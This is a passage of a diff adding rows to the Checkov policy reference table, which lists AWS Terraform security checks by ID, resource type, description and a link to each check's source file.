+|  136 | CKV_AWS_65      | resource | aws_ecs_cluster                                         | Ensure container insights are enabled on ECS cluster                                                                                                                                                     | Terraform | [ECSClusterContainerInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterContainerInsights.py)                                                                         |
+|  137 | CKV_AWS_66      | resource | aws_cloudwatch_log_group                                | Ensure that CloudWatch Log Group specifies retention days                                                                                                                                                | Terraform | [CloudWatchLogGroupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetention.py)                                                                         |
+|  138 | CKV_AWS_67      | resource | aws_cloudtrail                                          | Ensure CloudTrail is enabled in all Regions                                                                                                                                                              | Terraform | [CloudtrailMultiRegion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailMultiRegion.py)                                                                                     |
+|  139 | CKV_AWS_68      | resource | aws_cloudfront_distribution                             | CloudFront Distribution should have WAF enabled                                                                                                                                                          | Terraform | [WAFEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFEnabled.py)                                                                                                           |
+|  140 | CKV_AWS_69      | resource | aws_mq_broker                                           | Ensure MQ Broker is not publicly exposed                                                                                                                                                                 | Terraform | [MQBrokerNotPubliclyExposed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerNotPubliclyExposed.py)                                                                           |
+|  141 | CKV_AWS_70      | resource | aws_s3_bucket                                           | Ensure S3 bucket does not allow an action with any Principal                                                                                                                                             | Terraform | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py)                                                                                       |
+|  142 | CKV_AWS_70      | resource | aws_s3_bucket_policy                                    | Ensure S3 bucket does not allow an action with any Principal                                                                                                                                             | Terraform | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py)                                                                                       |
+|  143 | CKV_AWS_71      | resource | aws_redshift_cluster                                    | Ensure Redshift Cluster logging is enabled                                                                                                                                                               | Terraform | [RedshiftClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterLogging.py)                                                                                   |
+|  144 | CKV_AWS_72      | resource | aws_sqs_queue_policy                                    | Ensure SQS policy does not allow ALL (*) actions.                                                                                                                                                        | Terraform | [SQSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSPolicy.py)                                                                                                             |
+|  145 | CKV_AWS_73      | resource | aws_api_gateway_stage                                   | Ensure API Gateway has X-Ray Tracing enabled                                                                                                                                                             | Terraform | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayXray.py)                                                                                                   |
+|  146 | CKV_AWS_74      | resource | aws_docdb_cluster                                       | Ensure DocumentDB is encrypted at rest (default is unencrypted)                                                                                                                                          | Terraform | [DocDBEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryption.py)                                                                                                 |
+|  147 | CKV_AWS_75      | resource | aws_globalaccelerator_accelerator                       | Ensure Global Accelerator accelerator has flow logs enabled                                                                                                                                              | Terraform | [GlobalAcceleratorAcceleratorFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlobalAcceleratorAcceleratorFlowLogs.py)                                                       |
+|  148 | CKV_AWS_76      | resource | aws_api_gateway_stage                                   | Ensure API Gateway has Access Logging enabled                                                                                                                                                            | Terraform | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py)                                                                                 |
+|  149 | CKV_AWS_76      | resource | aws_apigatewayv2_stage                                  | Ensure API Gateway has Access Logging enabled                                                                                                                                                            | Terraform | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py)                                                                                 |
+|  150 | CKV_AWS_77      | resource | aws_athena_database                                     | Ensure Athena Database is encrypted at rest (default is unencrypted)                                                                                                                                     | Terraform | [AthenaDatabaseEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaDatabaseEncryption.py)                                                                               |
+|  151 | CKV_AWS_78      | resource | aws_codebuild_project                                   | Ensure that CodeBuild Project encryption is not disabled                                                                                                                                                 | Terraform | [CodeBuildProjectEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildProjectEncryption.py)                                                                           |
+|  152 | CKV_AWS_79      | resource | aws_instance                                            | Ensure Instance Metadata Service Version 1 is not enabled                                                                                                                                                | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py)                                                                                                   |
+|  153 | CKV_AWS_79      | resource | aws_launch_configuration                                | Ensure Instance Metadata Service Version 1 is not enabled                                                                                                                                                | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py)                                                                                                   |
+|  154 | CKV_AWS_79      | resource | aws_launch_template                                     | Ensure Instance Metadata Service Version 1 is not enabled                                                                                                                                                | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py)                                                                                                   |
+|  155 | CKV_AWS_80      | resource | aws_msk_cluster                                         | Ensure MSK Cluster logging is enabled                                                                                                                                                                    | Terraform | [MSKClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterLogging.py)                                                                                             |
+|  156 | CKV_AWS_81      | resource | aws_msk_cluster                                         | Ensure MSK Cluster encryption in rest and transit is enabled                                                                                                                                             | Terraform | [MSKClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterEncryption.py)                                                                                       |
+|  157 | CKV_AWS_82      | resource | aws_athena_workgroup                                    | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption                                                                                                              | Terraform | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupConfiguration.py)                                                                       |
+|  158 | CKV_AWS_83      | resource | aws_elasticsearch_domain                                | Ensure Elasticsearch Domain enforces HTTPS                                                                                                                                                               | Terraform | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py)                                                                 |
+|  159 | CKV_AWS_83      | resource | aws_opensearch_domain                                   | Ensure Elasticsearch Domain enforces HTTPS                                                                                                                                                               | Terraform | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py)                                                                 |
+|  160 | CKV_AWS_84      | resource | aws_elasticsearch_domain                                | Ensure Elasticsearch Domain Logging is enabled                                                                                                                                                           | Terraform | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py)                                                                           |
+|  161 | CKV_AWS_84      | resource | aws_opensearch_domain                                   | Ensure Elasticsearch Domain Logging is enabled                                                                                                                                                           | Terraform | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py)                                                                           |
+|  162 | CKV_AWS_85      | resource | aws_docdb_cluster                                       | Ensure DocumentDB Logging is enabled                                                                                                                                                                     | Terraform | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBLogging.py)                                                                                                       |
+|  163 | CKV_AWS_86      | resource | aws_cloudfront_distribution                             | Ensure CloudFront distribution has Access Logging enabled                                                                                                                                                | Terraform | [CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionLogging.py)                                                                     |
+|  164 | CKV_AWS_87      | resource | aws_redshift_cluster                                    | Redshift cluster should not be publicly accessible                                                                                                                                                       | Terraform | [RedshitClusterPubliclyAvailable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshitClusterPubliclyAvailable.py)                                                                 |
+|  165 | CKV_AWS_88      | resource | aws_instance                                            | EC2 instance should not have public IP.                                                                                                                                                                  | Terraform | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py)                                                                                                         |
+|  166 | CKV_AWS_88      | resource | aws_launch_template                                     | EC2 instance should not have public IP.                                                                                                                                                                  | Terraform | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py)                                                                                                         |
+|  167 | CKV_AWS_89      | resource | aws_dms_replication_instance                            | DMS replication instance should not be publicly accessible                                                                                                                                               | Terraform | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py)                                               |
+|  168 | CKV_AWS_90      | resource | aws_docdb_cluster_parameter_group                       | Ensure DocumentDB TLS is not disabled                                                                                                                                                                    | Terraform | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBTLS.py)                                                                                                               |
+|  169 | CKV_AWS_91      | resource | aws_alb                                                 | Ensure the ELBv2 (Application/Network) has access logging enabled                                                                                                                                        | Terraform | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py)                                                                                                 |
+|  170 | CKV_AWS_91      | resource | aws_lb                                                  | Ensure the ELBv2 (Application/Network) has access logging enabled                                                                                                                                        | Terraform | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py)                                                                                                 |
+|  171 | CKV_AWS_92      | resource | aws_elb                                                 | Ensure the ELB has access logging enabled                                                                                                                                                                | Terraform | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBAccessLogs.py)                                                                                                     |
+|  172 | CKV_AWS_93      | resource | aws_s3_bucket                                           | Ensure S3 bucket policy does not lockout all but root user. (Prevent lockouts needing root account fixes)                                                                                                | Terraform | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py)                                                                     |
+|  173 | CKV_AWS_93      | resource | aws_s3_bucket_policy                                    | Ensure S3 bucket policy does not lockout all but root user. (Prevent lockouts needing root account fixes)                                                                                                | Terraform | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py)                                                                     |
+|  174 | CKV_AWS_94      | resource | aws_glue_data_catalog_encryption_settings               | Ensure Glue Data Catalog Encryption is enabled                                                                                                                                                           | Terraform | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueDataCatalogEncryption.py)                                                                             |
+|  175 | CKV_AWS_96      | resource | aws_rds_cluster                                         | Ensure all data stored in Aurora is securely encrypted at rest                                                                                                                                           | Terraform | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AuroraEncryption.py)                                                                                               |
+|  176 | CKV_AWS_97      | resource | aws_ecs_task_definition                                 | Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions                                                                                                                          | Terraform | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py)                                                       |
+|  177 | CKV_AWS_98      | resource | aws_sagemaker_endpoint_configuration                    | Ensure all data stored in the Sagemaker Endpoint is securely encrypted at rest                                                                                                                           | Terraform | [SagemakerEndpointConfigurationEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerEndpointConfigurationEncryption.py)                                               |
+|  178 | CKV_AWS_99      | resource | aws_glue_security_configuration                         | Ensure Glue Security Configuration Encryption is enabled                                                                                                                                                 | Terraform | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfiguration.py)                                                                             |
+|  179 | CKV_AWS_100     | resource | aws_eks_node_group                                      | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0                                                                                                                               | Terraform | [EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSNodeGroupRemoteAccess.py)                                                                               |
+|  180 | CKV_AWS_101     | resource | aws_neptune_cluster                                     | Ensure Neptune logging is enabled                                                                                                                                                                        | Terraform | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterLogging.py)                                                                                     |
+|  181 | CKV_AWS_102     | resource | aws_neptune_cluster_instance                            | Ensure Neptune Cluster instance is not publicly available                                                                                                                                                | Terraform | [NeptuneClusterInstancePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterInstancePublic.py)                                                                       |
+|  182 | CKV_AWS_103     | resource | aws_alb_listener                                        | Ensure that load balancer is using at least TLS 1.2                                                                                                                                                      | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml)                                                                               |
+|  183 | CKV_AWS_103     | resource | aws_lb                                                  | Ensure that load balancer is using at least TLS 1.2                                                                                                                                                      | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml)                                                                               |
+|  184 | CKV_AWS_103     | resource | aws_lb_listener                                         | Ensure that load balancer is using at least TLS 1.2                                                                                                                                                      | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml)                                                                               |
+|  185 | CKV_AWS_104     | resource | aws_docdb_cluster_parameter_group                       | Ensure DocumentDB has audit logs enabled                                                                                                                                                                 | Terraform | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBAuditLogs.py)                                                                                                   |
+|  186 | CKV_AWS_105     | resource | aws_redshift_parameter_group                            | Ensure Redshift uses SSL                                                                                                                                                                                 | Terraform | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedShiftSSL.py)                                                                                                         |
+|  187 | CKV_AWS_106     | resource | aws_ebs_encryption_by_default                           | Ensure EBS default encryption is enabled                                                                                                                                                                 | Terraform | [EBSDefaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSDefaultEncryption.py)                                                                                       |
+|  188 | CKV_AWS_107     | data     | aws_iam_policy_document                                 | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMCredentialsExposure.py)                                                                                       |
+|  189 | CKV_AWS_108     | data     | aws_iam_policy_document                                 | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMDataExfiltration.py)                                                                                             |
+|  190 | CKV_AWS_109     | data     | aws_iam_policy_document                                 | Ensure IAM policies does not allow permissions management / resource exposure without constraints                                                                                                        | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPermissionsManagement.py)                                                                                   |
+|  191 | CKV_AWS_110     | data     | aws_iam_policy_document                                 | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPrivilegeEscalation.py)                                                                                       |
+|  192 | CKV_AWS_111     | data     | aws_iam_policy_document                                 | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMWriteAccess.py)                                                                                                       |
+|  193 | CKV_AWS_112     | resource | aws_ssm_document                                        | Ensure Session Manager data is encrypted in transit                                                                                                                                                      | Terraform | [SSMSessionManagerDocumentEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentEncryption.py)                                                         |
+|  194 | CKV_AWS_113     | resource | aws_ssm_document                                        | Ensure Session Manager logs are enabled and encrypted                                                                                                                                                    | Terraform | [SSMSessionManagerDocumentLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentLogging.py)                                                               |
+|  195 | CKV_AWS_114     | resource | aws_emr_cluster                                         | Ensure that EMR clusters with Kerberos have Kerberos Realm set                                                                                                                                           | Terraform | [EMRClusterKerberosAttributes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterKerberosAttributes.py)                                                                       |
+|  196 | CKV_AWS_115     | resource | aws_lambda_function                                     | Ensure that AWS Lambda function is configured for function-level concurrent execution limit                                                                                                              | Terraform | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py)                                         |
+|  197 | CKV_AWS_116     | resource | aws_lambda_function                                     | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ)                                                                                                                               | Terraform | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaDLQConfigured.py)                                                                                         |
+|  198 | CKV_AWS_117     | resource | aws_lambda_function                                     | Ensure that AWS Lambda function is configured inside a VPC                                                                                                                                               | Terraform | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaInVPC.py)                                                                                                         |
+|  199 | CKV_AWS_118     | resource | aws_db_instance                                         | Ensure that enhanced monitoring is enabled for Amazon RDS instances                                                                                                                                      | Terraform | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py)                                                                             |
+|  200 | CKV_AWS_118     | resource | aws_rds_cluster_instance                                | Ensure that enhanced monitoring is enabled for Amazon RDS instances                                                                                                                                      | Terraform | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py)                                                                             |
+|  201 | CKV_AWS_119     | resource | aws_dynamodb_table                                      | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK                                                                                                                                    | Terraform | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTablesEncrypted.py)                                                                                 |
+|  202 | CKV_AWS_120     | resource | aws_api_gateway_stage                                   | Ensure API Gateway caching is enabled                                                                                                                                                                    | Terraform | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCacheEnable.py)                                                                                     |
+|  203 | CKV_AWS_121     | resource | aws_config_configuration_aggregator                     | Ensure AWS Config is enabled in all regions                                                                                                                                                              | Terraform | [ConfigConfgurationAggregatorAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConfigConfgurationAggregatorAllRegions.py)                                                   |
+|  204 | CKV_AWS_122     | resource | aws_sagemaker_notebook_instance                         | Ensure that direct internet access is disabled for an Amazon SageMaker Notebook Instance                                                                                                                 | Terraform | [SageMakerInternetAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SageMakerInternetAccessDisabled.py)                                                                 |
+|  205 | CKV_AWS_123     | resource | aws_vpc_endpoint_service                                | Ensure that VPC Endpoint Service is configured for Manual Acceptance                                                                                                                                     | Terraform | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCEndpointAcceptanceConfigured.py)                                                                 |
+|  206 | CKV_AWS_124     | resource | aws_cloudformation_stack                                | Ensure that CloudFormation stacks are sending event notifications to an SNS topic                                                                                                                        | Terraform | [CloudformationStackNotificationArns.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudformationStackNotificationArns.py)                                                         |
+|  207 | CKV_AWS_126     | resource | aws_instance                                            | Ensure that detailed monitoring is enabled for EC2 instances                                                                                                                                             | Terraform | [EC2DetailedMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2DetailedMonitoringEnabled.py)                                                                       |
+|  208 | CKV_AWS_127     | resource | aws_elb                                                 | Ensure that Elastic Load Balancer(s) uses SSL certificates provided by AWS Certificate Manager                                                                                                           | Terraform | [ELBUsesSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBUsesSSL.py)                                                                                                           |
+|  209 | CKV_AWS_129     | resource | aws_db_instance                                         | Ensure that respective logs of Amazon Relational Database Service (Amazon RDS) are enabled                                                                                                               | Terraform | [DBInstanceLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceLogging.py)                                                                                             |
+|  210 | CKV_AWS_130     | resource | aws_subnet                                              | Ensure VPC subnets do not assign public IP by default                                                                                                                                                    | Terraform | [SubnetPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SubnetPublicIP.py)                                                                                                   |
+|  211 | CKV_AWS_131     | resource | aws_alb                                                 | Ensure that ALB drops HTTP headers                                                                                                                                                                       | Terraform | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py)                                                                                           |
+|  212 | CKV_AWS_131     | resource | aws_lb                                                  | Ensure that ALB drops HTTP headers                                                                                                                                                                       | Terraform | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py)                                                                                           |
+|  213 | CKV_AWS_133     | resource | aws_db_instance                                         | Ensure that RDS instances has backup policy                                                                                                                                                              | Terraform | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py)                                                                 |
+|  214 | CKV_AWS_133     | resource | aws_rds_cluster                                         | Ensure that RDS instances has backup policy                                                                                                                                                              | Terraform | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py)                                                                 |
+|  215 | CKV_AWS_134     | resource | aws_elasticache_cluster                                 | Ensure that Amazon ElastiCache Redis clusters have automatic backup turned on                                                                                                                            | Terraform | [ElasticCacheAutomaticBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticBackup.py)                                                                         |
+|  216 | CKV_AWS_135     | resource | aws_instance                                            | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Terraform | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2EBSOptimized.py)                                                                                                 |
+|  217 | CKV_AWS_136     | resource | aws_ecr_repository                                      | Ensure that ECR repositories are encrypted using KMS                                                                                                                                                     | Terraform | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRRepositoryEncrypted.py)                                                                                   |
+|  218 | CKV_AWS_137     | resource | aws_elasticsearch_domain                                | Ensure that Elasticsearch is configured inside a VPC                                                                                                                                                     | Terraform | [ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py)                                                                                           |
+|  219 | CKV_AWS_137     | resource | aws_opensearch_domain                                   | Ensure that Elasticsearch is configured inside a VPC                                                                                                                                                     | Terraform | [ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py)                                                                                           |
+|  220 | CKV_AWS_138     | resource | aws_elb                                                 | Ensure that ELB is cross-zone-load-balancing enabled                                                                                                                                                     | Terraform | [ELBCrossZoneEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBCrossZoneEnable.py)                                                                                           |
+|  221 | CKV_AWS_139     | resource | aws_rds_cluster                                         | Ensure that RDS clusters have deletion protection enabled                                                                                                                                                | Terraform | [RDSDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSDeletionProtection.py)                                                                                     |
+|  222 | CKV_AWS_140     | resource | aws_rds_global_cluster                                  | Ensure that RDS global clusters are encrypted                                                                                                                                                            | Terraform | [RDSClusterEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncrypted.py)                                                                                         |
+|  223 | CKV_AWS_141     | resource | aws_redshift_cluster                                    | Ensured that Redshift cluster allowing version upgrade by default                                                                                                                                        | Terraform | [RedshiftClusterAllowVersionUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAllowVersionUpgrade.py)                                                           |
+|  224 | CKV_AWS_142     | resource | aws_redshift_cluster                                    | Ensure that Redshift cluster is encrypted by KMS                                                                                                                                                         | Terraform | [RedshiftClusterKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterKMSKey.py)                                                                                     |
+|  225 | CKV_AWS_143     | resource | aws_s3_bucket                                           | Ensure that S3 bucket has lock configuration enabled by default                                                                                                                                          | Terraform | [S3BucketObjectLock.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectLock.py)                                                                                           |
+|  226 | CKV_AWS_144     | resource | aws_s3_bucket                                           | Ensure that S3 bucket has cross-region replication enabled                                                                                                                                               | Terraform | [S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml)                                                       |
+|  227 | CKV_AWS_144     | resource | aws_s3_bucket_replication_configuration                 | Ensure that S3 bucket has cross-region replication enabled                                                                                                                                               | Terraform | [S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml)                                                       |
+|  228 | CKV_AWS_145     | resource | aws_s3_bucket                                           | Ensure that S3 buckets are encrypted with KMS by default                                                                                                                                                 | Terraform | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml)                                                                         |
+|  229 | CKV_AWS_145     | resource | aws_s3_bucket_server_side_encryption_configuration      | Ensure that S3 buckets are encrypted with KMS by default                                                                                                                                                 | Terraform | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml)                                                                         |
+|  230 | CKV_AWS_146     | resource | aws_db_cluster_snapshot                                 | Ensure that RDS database cluster snapshot is encrypted                                                                                                                                                   | Terraform | [RDSClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterSnapshotEncrypted.py)                                                                         |
+|  231 | CKV_AWS_147     | resource | aws_codebuild_project                                   | Ensure that CodeBuild projects are encrypted using CMK                                                                                                                                                   | Terraform | [CodebuildUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildUsesCMK.py)                                                                                               |
+|  232 | CKV_AWS_148     | resource | aws_default_vpc                                         | Ensure no default VPC is planned to be provisioned                                                                                                                                                       | Terraform | [VPCDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCDefaultNetwork.py)                                                                                             |
+|  233 | CKV_AWS_149     | resource | aws_secretsmanager_secret                               | Ensure that Secrets Manager secret is encrypted using KMS CMK                                                                                                                                            | Terraform | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecretEncrypted.py)                                                                       |
